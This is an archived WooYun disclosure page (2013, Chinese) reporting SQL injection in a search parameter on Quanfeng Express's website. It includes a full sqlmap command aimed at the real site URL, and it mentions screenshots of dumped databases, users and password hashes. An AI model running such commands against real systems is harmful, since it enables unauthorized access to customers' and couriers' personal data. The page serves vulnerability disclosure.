当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-040054
漏洞标题:
全峰快递主站sql注入漏洞一枚
相关厂商:
全峰快递
漏洞作者:
newbie0086
提交时间:
2013-10-17 17:32
修复时间:
2013-12-01 17:33
公开时间:
2013-12-01 17:33
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-10-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

淘宝说快递快到了,快递是全峰,半天还没送过来,想看看快递员的电话,
is dba? true,快递数据是个好东西,他好我也好

详细说明:

点击服务网店选项,进行搜索,得到搜索型注射点,参数keywords这

web2.png

漏洞证明:

注射点:

sqlmap -u "http://www.qfkd.com.cn/city.aspx?wang=200&city=662&type=手机&keywords=wooyun"  --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" --is-dba


dba.png


database:

database.png


user:

pass.png


other:

hash.png


修复方案:

云南白药疮口贴

版权声明:转载请注明来源 newbie0086@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝